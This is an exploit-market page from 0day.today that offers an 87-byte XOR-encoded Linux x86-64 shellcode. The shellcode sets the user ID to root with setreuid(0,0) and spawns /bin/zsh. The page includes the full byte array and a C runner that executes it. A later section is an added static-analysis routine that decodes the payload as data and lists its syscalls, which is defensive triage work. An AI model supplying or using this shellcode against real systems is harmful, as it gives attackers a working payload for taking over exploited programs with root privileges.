0day Today Exploits Market and 0day Exploits Database

Linux/x86-64 - setreuid(0,0) + execve(/bin/zsh, [/bin/zsh, NULL]) + XOR Encoded Shellcode (87 bytes)

Author: egeektronic
Risk: Security Risk High
0day-ID: 0day-ID-29505
Category: shellcode
Date added: 15-01-2018
Platform: linux/x86-64
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/zsh", ["/bin/zsh", NULL]) + XOR encoded - 87 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
 
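/* Layout: bytes 0-38 are the decoder stub, bytes 39-86 are the payload
   XOR-encoded with the key 0x3c. The stub decodes the payload in place,
   stops at the first zero byte (the string literal's NUL), then jumps to
   it. Decoded, the payload calls setreuid(0,0) (syscall 113) and then
   execve("/bin/zsh", ["/bin/zsh", NULL], NULL) (syscall 59). */
unsigned char shellcode[] =
"\x4d\x31\xc0\x41\xb1\x3c\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x74\x0d\xfc\x74\xbf\xfc"
"\x4d\x74\x0d\xc3\x74\x0d\xca\x33\x39\xd7\x2e\x74\x0d\xfc\x74"
"\xbf\xfc\x07\x63\x74\x0d\xee\x6e\x6b\x74\xb5\xda\x33\x39\xd4"
"\xd5\xc3\xc3\xc3\x13\x5e\x55\x52\x13\x46\x4f\x54";

/* Cast the byte array to a function pointer and call it. */
int main(void) { ((void (*)())shellcode)(); }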
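
For static triage, the XOR layer can be removed without executing any of the bytes. The following is an added example, not part of the original submission; the stub length (39), key offset (5) and function names are assumptions read off this particular decoder stub and do not carry over to other encoders.

```c
#include <stdio.h>
#include <string.h>

/* Bytes copied from the page's shellcode[]; handled as data, never executed. */
static const unsigned char sample[] =
"\x4d\x31\xc0\x41\xb1\x3c\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x74\x0d\xfc\x74\xbf\xfc"
"\x4d\x74\x0d\xc3\x74\x0d\xca\x33\x39\xd7\x2e\x74\x0d\xfc\x74"
"\xbf\xfc\x07\x63\x74\x0d\xee\x6e\x6b\x74\xb5\xda\x33\x39\xd4"
"\xd5\xc3\xc3\xc3\x13\x5e\x55\x52\x13\x46\x4f\x54";

enum { STUB_LEN = 39, KEY_OFF = 5 };   /* assumptions: layout of this stub */

/* Decode the payload into out[]. Returns the decoded length, or 0 when the
   blob does not begin with this stub's "xor r8,r8; mov r9b,imm8" prologue. */
size_t decode_payload(const unsigned char *blob, size_t len,
                      unsigned char *out, size_t cap)
{
    static const unsigned char prologue[] = { 0x4d, 0x31, 0xc0, 0x41, 0xb1 };
    size_t n = 0;
    if (len <= STUB_LEN || memcmp(blob, prologue, sizeof prologue) != 0)
        return 0;
    unsigned char key = blob[KEY_OFF];
    /* Like the stub itself, stop at the first zero byte. */
    for (size_t i = STUB_LEN; i < len && blob[i] != 0 && n < cap; i++)
        out[n++] = (unsigned char)(blob[i] ^ key);
    return n;
}

/* Collect the imm8 of every "add rax, imm8" (48 83 c0 ib); this payload
   uses that instruction to load each syscall number. */
size_t syscall_numbers(const unsigned char *p, size_t n, int *nums, size_t cap)
{
    size_t found = 0;
    for (size_t i = 0; i + 3 < n && found < cap; i++)
        if (p[i] == 0x48 && p[i + 1] == 0x83 && p[i + 2] == 0xc0)
            nums[found++] = p[i + 3];
    return found;
}

int main(void)
{
    unsigned char buf[128]; int nums[4];
    size_t n = decode_payload(sample, sizeof sample, buf, sizeof buf);
    size_t k = syscall_numbers(buf, n, nums, 4);
    printf("key=0x%02x decoded=%zu bytes\n", sample[KEY_OFF], n);
    for (size_t i = 0; i < k; i++) printf("syscall %d\n", nums[i]);
    return 0;
}
```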

#  0day.today [2024-11-04]  #